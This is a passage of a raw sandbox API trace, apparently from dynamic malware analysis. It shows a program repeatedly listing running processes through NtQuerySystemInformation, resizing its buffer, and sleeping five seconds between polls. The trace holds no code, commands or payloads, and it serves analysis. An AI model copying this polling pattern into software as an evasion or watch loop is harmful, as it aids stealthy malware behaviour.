returned 0x0 [0221.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.848] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.857] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.864] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.937] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.959] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.967] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.976] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.983] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.991] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.998] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.005] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.014] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.022] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.030] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.037] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.044] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, 